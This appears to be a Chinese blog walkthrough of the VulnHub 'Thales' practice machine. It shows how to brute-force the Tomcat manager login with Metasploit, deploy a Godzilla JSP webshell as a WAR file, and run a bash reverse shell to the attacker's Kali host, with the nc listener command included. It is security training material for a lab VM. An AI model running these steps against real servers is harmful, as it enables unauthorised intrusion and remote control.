当前位置: 首页 > news >正文

Thales靶机攻略

1.下载导入VBox,并启动靶机

靶机地址:https://download.vulnhub.com/thales/Thales.zip

解压后,在VBox中导入虚拟电脑。包含所有网卡的MAC地址。

导入完成,设置网卡模式为仅主机网络。开启靶机。

kali网卡更改为桥接模式。点击工具栏的“编辑”----"虚拟网络编辑器",再点击右下角的“更改设置”,选择桥接网卡,修改已桥接至:VBox Host-Only 网卡,便于搜索靶机IP。点击应用----稍等一下,再点击确认。

先关闭后开启网络服务:systemctl stop networking                     systemctl start networking

查看kali的ip:发现是192.168.56.102

2.使用kali,扫描局域网内的主机,判断靶机的ip

扫描命令:nmap 192.168.56.1/24        且只有22和8080端口开启

3.访问靶机的8080端口

访问:http://192.168.56.101:8080

发现页面是Apache   Tomcat小猫页面,存在管理员登录。

4.  登录需要爆破用户名和密码,使用msf进行操作

kali进入msf:msfconsole         【执行命令后,需要等待运行一下】

注意:如果没msfconfig命令,请先安装。建议是:先更新一下apt,即apt update。如果更新过,则忽略更新这一步。再安装需要的命令:apt install msfconfig。

输入search tomcat login,进行设置后完成爆破。

设置1:use 0   使用这个方法

设置2:输入 show options,查看必须填写的信息  。

发现RHost、RPort  目标主机和目标端口必须设置

设置主机:set rhost 192.168.56.101,可访问端口只有8080,可以设置也可以不设置。

输入run运行程序,爆破用户名和密码:tomcat:role1

输入:exit,退出msf

5.使用爆破的用户名和密码,管理App登录

6. 发现可上传WAR包,进行上传木马操作

使用哥斯拉生成jsp木马文件,压缩成zip文件。修改压缩包后缀为.war。

上传war文件,点击部署。

7.访问上传的木马文件

访问:http://192.168.56.101:8080/webshell/webshell.jsp

访问成功。

8.使用哥斯拉进行连接

目标”添加“----写入木马url,选择木马类型,点击测试连接。连接成功。

点击添加。

9.反弹shell

右击连接--进入。选择命令执行。

执行反弹shell命令:/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/6688 0>&1'

这里是攻击者的ip,即kali的ip。

执行前,kali先进行监听:nc -lvvp 6688

执行反弹shell,kali监听收到了shell。执行whoami,可以看到是tomcat,成功。

Thales靶机练习结束。

本次靶机,对于网卡的配置很重要,也是重中之重。

这里使用msf进行爆破用户名和密码,是一种暴力破解工具。

靶机结束,剩余部分还未学到。不做说明。

希望对于困惑的朋友,可以有所帮助。当然也希望大家都最好能有所收获。

再见。。。

                                                                                                      --------------------2025/3/25 23:17

相关文章:

  • 鸿蒙移动应用开发--UI组件布局
  • 批量优化与压缩 PPT,减少 PPT 文件的大小
  • 【CSS3】01-初始CSS + 引入 + 选择器 + div盒子 + 字体修饰
  • Sar: 1靶场渗透
  • MoManipVLA:将视觉-语言-动作模型迁移到通用移动操作
  • 自然语言处理(13:RNN的实现)
  • 接口测试是什么
  • Mininet-topo.py源码解析
  • Linux--环境变量
  • Ubuntu 更换阿里云镜像源图文详细教程
  • Android面试总结之Android RecyclerView:从基础机制到缓存优化
  • 浅尝AI编程工具Trae
  • javascript实现一个函数,将数组中的元素随机打乱顺序
  • 如何用C#继承提升游戏开发效率?Enemy与Boss案例解析
  • 什么是ecovadis认证?ecovadis认证的好处?ecovadis认证的重要意义
  • 案例4:鸢尾花分类(pytorch)
  • 【Docker系列八】使用 Docker run 命令部署 Nginx
  • 初识哈希表
  • 详解接口的常见请求方式
  • 机器学习(八)
  • 外企聊营商|上海仲裁:化解跨国企业纠纷的“上海路径”
  • 六省会共建交通枢纽集群,中部六省离经济“第五极”有多远?
  • 中国首艘海洋级智能科考船“同济”号试航成功,可搭载水下遥控机器人
  • 租车订单时隔7年从花呗免密扣费?“GoFun出行”引质疑
  • 牛市早报|持续推进城市更新行动意见印发,证监会强化上市公司募资监管
  • “大型翻车现场”科技满满,黄骅打造现代化港口和沿海新城典范